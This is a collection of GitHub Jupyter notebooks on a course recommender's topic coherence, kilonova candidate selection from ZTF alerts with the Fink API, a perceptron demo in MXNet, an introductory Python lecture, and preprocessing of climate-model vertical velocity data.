rec_df = df.iloc[indices[0],:]
# Filter the df
# Filter df with semester
if semester in ['fall', 'winter']:
df = df[df['semester'] == semester]
else:
pass
# Filter df with acad_group
if filter_level == 'academic_group':
rec_df = rec_df[rec_df['Acad Group'].isin(input_ag)]
elif filter_level == 'subject':
rec_df = rec_df[(rec_df['Subject'].isin(input_sub)) | (rec_df['Course Title'].isin(input_course))]
else:
pass
req_dis = list(rec_df['requirements_distribution'].unique())
# Filter the df with lsa
if lsa in req_dis:
rec_df = rec_df[rec_df['requirements_distribution'] == lsa]
else:
# Give error message or no df
pass
return rec_df[:k]
%%time
dl_content(fw, stored_embeddings, stored_corpus, stored_embedder, 'EECS 587', k = 10, filter_level = None, semester = 'fall', lsa = 'BS')
import gensim
import gensim.corpora as corpora
from gensim.utils import simple_preprocess
from gensim.models import CoherenceModel
from gensim.models.ldamulticore import LdaMulticore
courses = fw['course'].unique()
def calc_topic_coherence(df):
def gen_words(texts):
final = []
for text in texts:
new = gensim.utils.simple_preprocess(text, deacc=True)
final.append(new)
return (final)
texts = gen_words(df['description'])
num_topics = 1
id2word = corpora.Dictionary(texts)
corpus = [id2word.doc2bow(text) for text in texts]
try:
model = LdaMulticore(corpus=corpus,id2word = id2word, num_topics = num_topics, alpha=.1, eta=0.1, random_state = 42)
#print('Model created')
coherencemodel = CoherenceModel(model = model, texts = texts, dictionary = id2word, coherence = 'c_v')
#print("Topic coherence: ",coherencemodel.get_coherence())
coherence_value = coherencemodel.get_coherence()
except:
coherence_value = None
return coherence_value
def coh(func):
coh_val = []
i = 0
while i <100:
input_course = np.random.choice(courses, 1)[0]
rec_df = func(fw, stored_embeddings, stored_corpus, stored_embedder, input_course, k = 10, filter_level = None, semester = '', lsa = '')
rec_df = rec_df.append(fw[fw['course'] == input_course])
rec_df['description'] = rec_df['description'].fillna('').astype(str)
val = calc_topic_coherence(rec_df)
if val != None:
coh_val.append(val)
i+=1
avg_coh_sk = np.average(coh_val)
return avg_coh_sk
%%time
dl_coh = coh(dl_content)
dl_coh
```
|
github_jupyter
|
# GRANDMA/Kilonova-catcher --- KN-Mangrove
The purpose of this notebook is to inspect the ZTF alerts that were selected by the Fink KN-Mangrove filter as potential Kilonova candidates in the period 2021/04/01 to 2021/08/31, and forwarded to the GRANDMA/Kilonova-catcher project for follow-up observations.
With the other filter (KN-LC), we need at least two days to identify a candidate. It may seem like a short amount of time, but if the object is a kilonova, it will already be fading or even too faint to be observed. The second filter aims to tackle younger detections. An alert will be considered as a candidate if, on top of the other cuts, one can identify a suitable host and the resulting absolute magnitude is compatible with the kilonovae models.
To identify possible hosts, we used the MANGROVE catalog [1]. It is an inventory of 800,000 galaxies. At this point, we are only interested in their position in the sky: right ascension, declination, and luminosity distance. We only considered the galaxies in a 230 Mpc range, as it is the current observation range of the gravitational waves interferometers.
This filter uses the following cuts:
- Point-like object: the star/galaxy extractor score must be above 0.4. This could be justified by saying that the alert should be a point-like object. Actually, few objects score below 0.4 given the current implementation, and objects that do are most likely boguses.
- Non-artefact: the deep real/bogus score must be above 0.5.
- Object non referenced in SIMBAD catalog (galactic ones).
- Young detection: less than 6 hours.
- Galaxy association: The alert should within 10 kpc of a galaxy from the Mangrove catalog.
- Absolute magnitude: the absolute magnitude of the alert should be −16 ± 1.
According to [2], we expect a kilonova event to display an absolute magnitude of −16 ± 1. We don’t know the distance of the alerts in general, so we will compute the absolute magnitude of an alert as if it were in a given galaxy. This threshold is given in the band g but it was implemented and band g and r without distinction. This hypothesis is due to the lack of observations.
The galaxy association method is also not perfect: it can lead to the mis-association of an event that is in the foreground or the background of a galaxy. But this is necessary as the luminosity distance between the earth and the alert is usually unknown.
[1] J-G Ducoin et al. “Optimizing gravitational waves follow-up using galaxies stellar mass”. In: Monthly Notices of the Royal Astronomical Society 492.4 (Jan. 2020), pp. 4768–4779. issn: 1365-2966. doi: 10.1093/mnras/staa114. url: http://dx.doi.org/10.1093/ mnras/staa114.
[2] Mansi M. Kasliwal et al. “Kilonova Luminosity Function Constraints Based on Zwicky Transient Facility Searches for 13 Neutron Star Merger Triggers during O3”. In: The Astrophysical Journal 905.2 (Dec. 2020), p. 145. issn: 1538-4357. doi: 10.3847/1538- 4357/abc335. url: http://dx.doi.org/10.3847/1538-4357/abc335.
```
import os
import requests
import pandas as pd
import numpy as np
from astropy.coordinates import SkyCoord
from astropy import units as u
# pip install fink_filters
from fink_filters import __file__ as fink_filters_location
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_context('talk')
APIURL = 'https://fink-portal.org'
```
## KN-Mangrove data
Let's load the alert data from this filter:
```
pdf_kn_ma = pd.read_parquet('data/0104_3009_kn_filter2_class.parquet')
nalerts_kn_ma = len(pdf_kn_ma)
nunique_alerts_kn_ma = len(np.unique(pdf_kn_ma['objectId']))
print(
'{} alerts loaded ({} unique objects)'.format(
nalerts_kn_ma,
nunique_alerts_kn_ma
)
)
```
## Visualising the candidates
Finally, let's inspect one lightcurve:
```
oid = pdf_kn_ma['objectId'].values[2]
tns_class = pdf_kn_ma['TNS'].values[2]
kn_trigger = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[2]
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'withupperlim': 'True'
}
)
# Format output in a DataFrame
pdf = pd.read_json(r.content)
fig = plt.figure(figsize=(15, 6))
colordic = {1: 'C0', 2: 'C1'}
for filt in np.unique(pdf['i:fid']):
maskFilt = pdf['i:fid'] == filt
# The column `d:tag` is used to check data type
maskValid = pdf['d:tag'] == 'valid'
plt.errorbar(
pdf[maskValid & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskValid & maskFilt]['i:magpsf'],
pdf[maskValid & maskFilt]['i:sigmapsf'],
ls = '', marker='o', color=colordic[filt]
)
maskUpper = pdf['d:tag'] == 'upperlim'
plt.plot(
pdf[maskUpper & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskUpper & maskFilt]['i:diffmaglim'],
ls='', marker='^', color=colordic[filt], markerfacecolor='none'
)
maskBadquality = pdf['d:tag'] == 'badquality'
plt.errorbar(
pdf[maskBadquality & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskBadquality & maskFilt]['i:magpsf'],
pdf[maskBadquality & maskFilt]['i:sigmapsf'],
ls='', marker='v', color=colordic[filt]
)
plt.axvline(kn_trigger - 2400000.5, ls='--', color='grey')
plt.gca().invert_yaxis()
plt.xlabel('Modified Julian Date')
plt.ylabel('Magnitude')
plt.title('{}'.format(oid))
plt.show()
print('{}/{}'.format(APIURL, oid))
```
Circles (●) with error bars show valid alerts that pass the Fink quality cuts. Upper triangles with errors (▲), representing alert measurements that do not satisfy Fink quality cuts, but are nevetheless contained in the history of valid alerts and used by classifiers. Lower triangles (▽), representing 5-sigma mag limit in difference image based on PSF-fit photometry contained in the history of valid alerts. The vertical line shows the KN trigger by Fink.
## Evolution of the classification
Each alert was triggered because the Fink pipelines favoured the KN flavor at the time of emission. But the underlying object on the sky might have generated further alerts after, and the classification could evolve. For a handful of alerts, let see what they became. For this, we will use the Fink REST API, and query all the data for the underlying object:
```
NALERTS = 3
oids = pdf_kn_ma['objectId'].values[0: NALERTS]
kn_triggers = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[0: NALERTS]
for oid, kn_trigger in zip(oids, kn_triggers):
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'output-format': 'json'
}
)
# Format output in a DataFrame
pdf_ = pd.read_json(r.content)
times, classes = np.transpose(pdf_[['i:jd','v:classification']].values)
fig = plt.figure(figsize=(12, 5))
plt.plot(times, classes, ls='', marker='o')
plt.axvline(kn_trigger, ls='--', color='C1')
plt.title(oid)
plt.xlabel('Time (Julian Date)')
plt.ylabel('Fink inferred classification')
plt.show()
oids
```
Note that Kilonova classification does not appear here as this label is reserved to the KN-LC filter. We are working on giving a new label.
One can see that alert classification for a given object can change over time. With time, we collect more data, and have a clearer view on the nature of the object. Let's make an histogram of the final classification for each object (~1min to run)
```
final_classes = []
oids = np.unique(pdf_kn_ma['objectId'].values)
for oid in oids:
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'output-format': 'json'
}
)
pdf_ = pd.read_json(r.content)
if not pdf_.empty:
final_classes.append(pdf_['v:classification'].values[0])
fig = plt.figure(figsize=(12, 5))
plt.hist(final_classes)
plt.xticks(rotation=15.)
plt.title('Final Fink classification of KN candidates');
```
Most of the objects are still unknown according to Fink.
## Follow-up of candidates by other instruments
Some of the alerts benefited from follow-up by other instruments to determine their nature. Usually this information can be found on the TNS server (although this is highly biased towards Supernovae). We attached this information to the alerts (if it exists):
```
pdf_kn_ma.groupby('TNS').count().sort_values('objectId', ascending=False)['objectId']
```
We can see that among all 53 alerts forwarded by Fink, 39 have no known counterpart in TNS (i.e. no follow-up result was reported).
## Retrieving Mangrove data
```
catalog_path = os.path.join(os.path.dirname(fink_filters_location), 'data/mangrove_filtered.csv')
pdf_mangrove = pd.read_csv(catalog_path)
pdf_mangrove.head(2)
# ZTF
ra1 = pdf_kn_ma['candidate'].apply(lambda x: x['ra'])
dec1 = pdf_kn_ma['candidate'].apply(lambda x: x['dec'])
# Mangrove
cols = ['internal_names', 'ra', 'declination', 'discoverydate', 'type']
ra2, dec2, name, lum_dist, ang_dist = pdf_mangrove['ra'], pdf_mangrove['dec'], pdf_mangrove['2MASS_name'], pdf_mangrove['lum_dist'], pdf_mangrove['ang_dist']
# create catalogs
catalog_ztf = SkyCoord(ra=ra1.values*u.degree, dec=dec1.values*u.degree)
catalog_tns = SkyCoord(ra=np.array(ra2, dtype=np.float)*u.degree, dec=np.array(dec2, dtype=np.float)*u.degree)
# cross-match
idx, d2d, d3d = catalog_ztf.match_to_catalog_sky(catalog_tns)
pdf_kn_ma['2MASS_name'] = name.values[idx]
pdf_kn_ma['separation (Kpc)'] = d2d.radian * ang_dist.values[idx] * 1000
pdf_kn_ma['lum_dist (Mpc)'] = lum_dist.values[idx]
pdf_kn_ma[['objectId', '2MASS_name', 'separation (Kpc)', 'lum_dist (Mpc)']].head(5)
fig = plt.figure(figsize=(12, 6))
plt.hist(pdf_kn_ma['lum_dist (Mpc)'], bins=20)
plt.xlabel('Luminosity distance of matching galaxies (Mpc)');
np.max(pdf_kn_ma['lum_dist (Mpc)'])
```
|
github_jupyter
|
# The Perceptron
```
import mxnet as mx
from mxnet import nd, autograd
import matplotlib.pyplot as plt
import numpy as np
mx.random.seed(1)
```
## A Separable Classification Problem
```
# generate fake data that is linearly separable with a margin epsilon given the data
def getfake(samples, dimensions, epsilon):
wfake = nd.random_normal(shape=(dimensions)) # fake weight vector for separation
bfake = nd.random_normal(shape=(1)) # fake bias
wfake = wfake / nd.norm(wfake) # rescale to unit length
# making some linearly separable data, simply by chosing the labels accordingly
X = nd.zeros(shape=(samples, dimensions))
Y = nd.zeros(shape=(samples))
i = 0
while (i < samples):
tmp = nd.random_normal(shape=(1,dimensions))
margin = nd.dot(tmp, wfake) + bfake
if (nd.norm(tmp).asscalar() < 3) & (abs(margin.asscalar()) > epsilon):
X[i,:] = tmp[0]
Y[i] = 1 if margin.asscalar() > 0 else -1
i += 1
return X, Y
# plot the data with colors chosen according to the labels
def plotdata(X,Y):
for (x,y) in zip(X,Y):
if (y.asscalar() == 1):
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='r')
else:
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='b')
# plot contour plots on a [-3,3] x [-3,3] grid
def plotscore(w,d):
xgrid = np.arange(-3, 3, 0.02)
ygrid = np.arange(-3, 3, 0.02)
xx, yy = np.meshgrid(xgrid, ygrid)
zz = nd.zeros(shape=(xgrid.size, ygrid.size, 2))
zz[:,:,0] = nd.array(xx)
zz[:,:,1] = nd.array(yy)
vv = nd.dot(zz,w) + d
CS = plt.contour(xgrid,ygrid,vv.asnumpy())
plt.clabel(CS, inline=1, fontsize=10)
X, Y = getfake(50, 2, 0.3)
plotdata(X,Y)
plt.show()
```
## Perceptron Implementation
```
def perceptron(w,b,x,y):
if (y * (nd.dot(w,x) + b)).asscalar() <= 0:
w += y * x
b += y
return 1
else:
return 0
w = nd.zeros(shape=(2))
b = nd.zeros(shape=(1))
for (x,y) in zip(X,Y):
res = perceptron(w,b,x,y)
if (res == 1):
print('Encountered an error and updated parameters')
print('data {}, label {}'.format(x.asnumpy(),y.asscalar()))
print('weight {}, bias {}'.format(w.asnumpy(),b.asscalar()))
plotscore(w,b)
plotdata(X,Y)
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='g')
plt.show()
```
## Perceptron Convergence in Action
```
Eps = np.arange(0.025, 0.45, 0.025)
Err = np.zeros(shape=(Eps.size))
for j in range(10):
for (i,epsilon) in enumerate(Eps):
X, Y = getfake(1000, 2, epsilon)
for (x,y) in zip(X,Y):
Err[i] += perceptron(w,b,x,y)
Err = Err / 10.0
plt.plot(Eps, Err, label='average number of updates for training')
plt.legend()
plt.show()
```
|
github_jupyter
|
# Lecture 2: Introducing Python
CSCI 1360E: Foundations for Informatics and Analytics
## Overview and Objectives
In this lecture, I'll introduce the Python programming language and how to interact with it; aka, the proverbial [Hello, World!](https://en.wikipedia.org/wiki/%22Hello,_World!%22_program) lecture. By the end, you should be able to:
- Recall basic history and facts about Python (relevance in scientific computing, comparison to other languages)
- Print arbitrary strings in a Python environment
- Create and execute basic arithmetic operations
- Understand and be able to use variable assignment and update
## Part 1: Background
Python as a language was implemented from the start by Guido van Rossum. What was originally something of a [snarkily-named hobby project to pass the holidays](https://www.python.org/doc/essays/foreword/) turned into a huge open source phenomenon used by millions.

### Python's history
The original project began in 1989.
- Release of Python 2.0 in 2000
- Release of Python 3.0 in 2008
- Latest stable release of these branches are **2.7.12**--which Guido *emphatically* insists is the final, final, final release of the 2.x branch--and **3.5.3** (which is what we're using in this course)
Wondering why a 2.x branch has survived a *decade and a half* after its initial release?
Python 3 was designed as backwards-incompatible; a good number of syntax changes and other internal improvements made the majority of code written for Python 2 unusable in Python 3.
This made it difficult for power users and developers to upgrade, particularly when they relied on so many third-party libraries for much of the heavy-lifting in Python.
Until these third-party libraries were themselves converted to Python 3 (really only in the past couple years!), most developers stuck with Python 2.
### Python, the Language
Python is an **intepreted** language.
Contrast with **compiled** languages like C, C++, and Java.
In practice, the distinction between **interpreted** and **compiled** has become blurry, particularly in the past decade.
- Interpreted languages *in general* are easier to use but run more slowly and consume more resources
- Compiled languages *in general* have a higher learning curve for programming, but run much more efficiently
As a consequence of these advantages and disadvantages, modern programming languages have attempted to combine the best of both worlds:
- Java is initially compiled into bytecode, which is then run through the Java Virtual Machine (JVM) which acts as an interpreter. In this sense, it is both a compiled language and an interpreted language.
- Python runs on a reference implementation, CPython, in which chunks of Python code are compiled into intermediate representations and executed.
- [Julia](http://julialang.org/), a relative newcomer in programming languages designed for scientific computing and data science, straddles a middle ground in a different way: using a "just-in-time" (JIT) compilation scheme, whereby code is compiled *as the program runs*, theoretically providing the performance of compiled programs with the ease of use of interpreted programs. JIT compilers have proliferated for other languages as well, including Python (but these are well beyond the scope of this course; take CSCI 4360 if interested!)
Python is a very **general** language.
- Not designed as a specialized language for performing a specific task. Instead, it relies on third-party developers to provide these extras.

Instead, as [Jake VanderPlas](http://jakevdp.github.io/) put it:
> "Python syntax is the glue that holds your data science code together. As many scientists and statisticians have found, Python excels in that role because it is powerful, intuitive, quick to write, fun to use, and above all extremely useful in day-to-day data science tasks."
### Zen of Python
One of the biggest reasons for Python's popularity is its overall simplicity and ease of use.
Python was designed *explicitly* with this in mind!
It's so central to the Python ethos, in fact, that it's baked into every Python installation. Tim Peters wrote a "poem" of sorts, *The Zen of Python*, that anyone with Python installed can read.
To see it, just type one line of Python code (yes, this is *live Python code*):
```
import this
```
Lack of any discernible meter or rhyming scheme aside, it nonetheless encapsulates the spirit of the Python language. These two lines are particular favorites of mine:
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Line 1:
- If you wrote the code and can't explain it\*, go back and fix it.
- If you didn't write the code and can't explain it, get the person who wrote it to fix it.
Line 2:
- "Easy to explain": necessary and sufficient for good code?
Don't you just feel so zen right now?
\* Lone exception to this rule: **code golf**


The goal of *code golf* is to write a program that achieves a certain objective **using as few characters as possible**.
The result is the complete gibberish you see in this screenshot. Fun for competitive purposes; insanely *not*-useful for real-world problems.
## Part 2: Hello, World!
Enough reading, time for some coding, amirite?
```
print("Hello, world!")
```
Yep! That's all there is to it.
Just for the sake of being thorough, though, let's go through this command in painstaking detail.
**Functions**: `print()` is a function.
- Functions take input, perform an operation on it, and give back (return) output.
You can think of it as a direct analog of the mathematical term, $f(x) = y$. In this case, $f()$ is the function; $x$ is the input, and $y$ is the output.
Later in the course, we'll see how to create our own functions, but for now we'll make use of the ones Python provides us by default.
**Arguments**: the input to the function.
- Interchangeable with "parameters".
In this case, there is only one argument to `print()`: a string of text that we want printed out. This text, in Python parlance, is called a "string". I can only presume it is so named because it is a *string* of individual characters.
We can very easily change the argument we pass to `print()`:
```
print("This is not the same argument as before.")
```
We could also print out an empty string, or even no string at all.
```
print("") # this is an empty string
print() # this is just nothing
```
In both cases, the output looks pretty much the same...because it is: just a blank line.
- After `print()` finishes printing your input, it prints one final character--a *newline*.
This is basically the programmatic equivalent of hitting `Enter` at the end of a line, moving the cursor down to the start of the next line.
### What are "strings"?
Briefly--a type of data format in Python that exclusively uses alphanumeric (A through Z, 0 through 9) characters.
Look for the double-quotes!
```
"5" # This is a string.
5 # This is NOT a string.
```
### What are the hashtags? (`#`)
Delineators for *comments*.
- Comments are lines in your program that the language ignores entirely.
- When you type a `#` in Python, everything *after* that symbol on the same line is ignored by Python.
They're there purely for the developers as a way to put documentation and clarifying statements directly into the code. It's a practice I **strongly** encourage everyone to do--even just to remind yourself what you were thinking! I can't count the number of times I worked on code, set it aside for a month, then came back to it and had absolutely no idea what I was doing)
## Part 3: Beyond "Hello, World!"
Ok, so Python can print strings. That's cool. Can it do anything that's actually useful?
Python has a lot of built-in objects and data structures that are very useful for more advanced operations--and we'll get to them soon enough!--but for now, you can use Python to perform basic arithmetic operations.
Addition, subtraction, multiplication, division--they're all there. You can use it as a glorified calculator:
```
3 + 4
3 - 4
3 * 4
3 / 4
```
Python respects order of operations, too, performing them as you'd expect:
```
3 + 4 * 6 / 2 - 5
(3 + 4) * 6 / (2 - 5)
```
Python even has a really cool exponent operator, denoted by using two stars right next to each other:
```
2 ** 3 # 2 raised to the 3rd power
3 ** 2 # 3 squared
25 ** (1 / 2) # Square root of 25
```
Now for something really neat:
```
x = 2
x * 3
```
This is an example of using Python *variables*.
- Variables store and maintain values that can be updated and manipulated as the program runes.
- You can name a variable whatever you like, as long as it doesn't start with a number ("`5var`" would be illegal, but "`var5`" would be fine) or conflict with reserved Python words (like `print`).
Here's an operation that involves two variables:
```
x = 2
y = 3
x * y
```
We can assign the result of operations with variables to other variables:
```
x = 2
y = 3
z = x * y
print(z)
```
The use of the equals sign `=` is called the *assignment operator*.
- "Assignment" takes whatever value is being computed on the right-hand side of the equation and *assigns* it to the variable on the left-hand side.
- Multiplication (`*`), Division (`/`), Addition (`+`), and Subtraction (`-`) are also *operators*.
What happens if I perform an assignment on something that can't be assigned a different value...such as, say, a number?
```
x = 2
y = 3
5 = x * y
```
**CRASH!**
Ok, not really; Python technically did what it was supposed to do. It threw an error, alerting you that something in your program didn't work for some reason. In this case, the error message is `can't assign to literal`.
Parsing out the `SyntaxError` message:
- `Error` is an obvious hint. `Syntax` gives us some context.
- We did something wrong that involves Python's syntax, or the structure of its language.
The "`literal`" being referred to is the number 5 in the statement: `5 = x * y`
- We are attempting to assign the result of the computation of `x * y` to the number 5
- However, 5 is known internally to Python as a "literal"
- 5 is literally 5; you can't change the value of 5! (5 = 8? NOPE)
So we can't assign values to numbers. What about assigning values to a variable that's used in the very same calculation?
```
x = 2
y = 3
x = x * y
print(x)
```
This works just fine! In fact, it's more than fine--this is such a standard operation, it has its own operator:
```
x = 2
y = 3
x *= y
print(x)
```
Out loud, it's pretty much what it sounds like: "x times equals y".
This is an instance of a shorthand operator.
- We multiplied `x` by `y` and stored the product in `x`, effectively updating it.
- There are many instances where you'll want to increment a variable: for example, when counting how many of some "thing" you have.
- All the other operators have the same shorthand-update versions: `+=` for addition, `-=` for subtraction, and `/=` for division.
## Review Questions
1: Let's say you want to count the number of words in Wikipedia. You have a variable to track this count: `word_count = 0`. For every word you come across, you'll update this counter by 1. Using the shorthand you saw before, what would the command be to update the variable at each word?
2: What would happen if I ran this command? Explain. `("5" + 5)`
3: In this lecture, we used what is essentially a Python shell in order to execute Python commands. Let's say, instead, we wanted to run a sequence of commands in a script. I've put a couple commands in the file `commands.py`. How would you execute this script from the command prompt?
4: What would happen if I ran this command? Explain. `x = y`
## Course Administrivia
- If you haven't done so yet, please **let me know to what email address you'd like me to send a Slack invite.** If I haven't heard from you by Thursday morning, I'll use your UGA address.
- Please check out the revamped [course website](https://eds-uga.github.io/csci1360e-su17/) if you have questions; it should have pretty much all the information you need about the course!
- Assignment 0 comes out tomorrow! It doesn't have a deadline, but is instead an introduction to using JupyterHub. Please go through it, as we'll be using JupyterHub all semester for both homeworks AND exams!
## Additional Resources
1. Guido's PyCon 2016 talk on the future of Python: https://www.youtube.com/watch?v=YgtL4S7Hrwo
2. VanderPlas, Jake. *Python Data Science Handbook*. 2016 (pre-release).
|
github_jupyter
|
```
import numpy as np
import itertools
import math
import scipy
from scipy import spatial
import matplotlib.pyplot as plt
import matplotlib
import matplotlib.patches as patches
from matplotlib import animation
from matplotlib import transforms
from mpl_toolkits.axes_grid1 import make_axes_locatable
import xarray as xr
import dask
from sklearn.cluster import KMeans
from sklearn.cluster import AgglomerativeClustering
import pandas as pd
import netCDF4
def plot_generator_paper(sample, X, Z):
fz = 15*1.25
lw = 4
siz = 100
XNNA = 1.25 # Abscissa where architecture-constrained network will be placed
XTEXT = 0.25 # Text placement
YTEXT = 0.3 # Text placement
plt.rc('text', usetex=False)
matplotlib.rcParams['mathtext.fontset'] = 'stix'
matplotlib.rcParams['font.family'] = 'STIXGeneral'
#mpl.rcParams["font.serif"] = "STIX"
plt.rc('font', family='serif', size=fz)
matplotlib.rcParams['lines.linewidth'] = lw
cmap="RdBu_r"
fig, ax = plt.subplots(1,1, figsize=(15,6))
cs0 = ax.pcolor(X, Z, sample, cmap=cmap, vmin=-1.0, vmax = 1.0)
ax.set_title("Anomalous Vertical Velocity Field Detected By ELBO")
ax.set_ylim(ax.get_ylim()[::-1])
ax.set_xlabel("CRMs", fontsize=fz*1.5)
ax.xaxis.set_label_coords(0.54,-0.05)
h = ax.set_ylabel("hPa", fontsize = fz*1.5)
h.set_rotation(0)
ax.yaxis.set_label_coords(-0.10,0.44)
#y_ticks = np.arange(1350, 0, -350)
#ax.set_yticklabels(y_ticks, fontsize=fz*1.33)
ax.tick_params(axis='x', labelsize=fz*1.33)
ax.tick_params(axis='y', labelsize=fz*1.33)
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = fig.colorbar(cs0, cax=cax)
cbar.set_label(label=r'$\left(\mathrm{m\ s^{-1}}\right)$', rotation="horizontal", fontsize=fz*1.5, labelpad=30, y = 0.65)
plt.show()
#plt.savefig("/fast/gmooers/gmooers_git/CBRAIN-CAM/MAPS/CI_Figure_Data/Anomaly.pdf")
#plot_generator(test[0,:,:])
path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-20-00000.nc'
extra_variables = xr.open_dataset(path_to_file)
lats = np.squeeze(extra_variables.LAT_20s_to_20n.values)
lons = np.squeeze(extra_variables.LON_0e_to_360e.values)
path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.20*'
extra_variables = xr.open_mfdataset(path_to_file)
amazon = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,-29])
atlantic = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,121])
print(amazon.shape)
others = netCDF4.Dataset("/fast/gmooers/Raw_Data/extras/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-01-00000.nc")
levs = np.array(others.variables['lev'])
new = np.flip(levs)
crms = np.arange(1,129,1)
Xs, Zs = np.meshgrid(crms, new)
Max_Scalar = np.load("/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Max_Scalar.npy")
Min_Scalar = np.load("/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Min_Scalar.npy")
day_images = amazon[16:112,:,:]
week_images = amazon[16:112*6+16,:,:]
synoptic_imagess = amazon[16:112*13,:,:]
atlantic_day_images = atlantic[5:101,:,:]
atlantic_week_images = atlantic[5:96*7+5,:,:]
atlantic_synoptic_imagess = atlantic[5:96*14+5,:,:]
Test_Day = np.interp(day_images, (Min_Scalar, Max_Scalar), (0, 1))
Test_Week = np.interp(week_images, (Min_Scalar, Max_Scalar), (0, 1))
Test_Synoptic = np.interp(synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Day = np.interp(atlantic_day_images, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Week = np.interp(atlantic_week_images, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Synoptic = np.interp(atlantic_synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_day.npy",Test_Day)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_week.npy",Test_Week)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_synoptic.npy",Test_Synoptic)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_day.npy",atlantic_Test_Day)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_week.npy",atlantic_Test_Week)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_synoptic.npy",atlantic_Test_Synoptic)
All_amazon = np.interp(amazon[16:,:,:], (Min_Scalar, Max_Scalar), (0, 1))
All_Atlantic = np.interp(atlantic[5:,:,:], (Min_Scalar, Max_Scalar), (0, 1))
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_amazon_all.npy",All_amazon)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_atlantic_all.npy",All_Atlantic)
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/JaccoVeldscholten/SmartDispenser/blob/main/BAVA_Temp_Predictions.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<div>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABpQAAAIHCAYAAACR5L9TAAAACXBIWXMAAC4jAAAuIwF4pT92AAAgAElEQVR4nOzdS3IcyZUw6ujfeo76Z5kjVE9zguoVAL0CsFdAagWiViBqBaJWINYKRKxA5ApEDG5Om5jczFkXVnCvBeEsIJnxcI/IR3j495mVSa22biUiwl/nuB//t/9n8/++qaqq/gc4rq/hny6fGv53v60Wyy/eDcB8rbebd1VV3XjFg9Vj5atMfzsToA0O9m61WDbNXwGOYr3dvK2qypif7v1qsfyY24/mfNbbzS/1d+MVjGKexCz9e1VVP1dVde31wtHFtLM/N/2H6+3mx//o4Yfk1I/Jqt8HLIMXQBbq4MiFVzVcvei1AYMRvloTDfKmZUMUwLHUc6ZLTzeZjeSkemNuNJp5ErP0714rZOnyh0n0j4P874mpH5JRn8O/vkxAfRvcJJ4AzmO93bySTDqINyHIBMlWi+WH9XbzXltM5pQAcDLhxIRkUrq71WLZVy0FfmSMH88zZJYklKAs3xNPLxNQ35JPLxJP93XpoKqqvoR//aTsHsBR2TF6GK8klBipLgX02kNMclEnxZVRAk7EnGkYfTRJJG8PxjyJWZJQAn50Ff7n70mnlwmn76X2Pn0/5eRkE8Bw6+3mp6qqbj3Cg7hcbzc3xiVGkFAa5pVgJXAidvsPo48mleTt4bzRBpkbCSUgxfdSe7+fcHqRaPoS/qkDeV9Wi+VvnixAL4GRw1KnnMHq3aPr7eZR2btk+jHg6JyYGOzO2pwBJJQO57beRKgdMif/x9sEDuAy7LCvTzP9s6qq/11vN1/X200dmHlX7xj3kAEaCcQelufJWB88wWQX4S44gGOyphzGyQiSuN/1KMyTmBUJJeBYdpJM6+3m/1tvN5/qC6/rCUoo8wRQLOXujkJgm7EklIbR7oBjc2JiGAklUhnTD88zZVYklIBTqkvl/bGqqn+EU0xfnGACCmZhcRyeK4OtFssvoZQvabQ74GjW283PL+76Jd6vymwxgDH98G5DPwazIKEEnNPVixNMv4USeW8MtEAh7LQ9DqdgGctu7nROBwLHpH8ZxnhGEuXujko/xmxIKAFTcRFKP/29qqr/CaeX3kouAXMU+rZrL/coLizYGOm9BziIdgcci0046R5Xi6WEEqmM5cejH2M2JJSAqapPL/1VcgmYKYu14/J8GWy1WH6tqureE0ym3QEHp9zdYJJJJAkn/I3lx3MlpsVcSCgBOfgxufRGOSMgc3aoHdetcYKRPniAyZS9A45BvzKMhBKplLs7PmtAZkFCCcjNVSiL97/r7ebDeru58QaBnNhpezI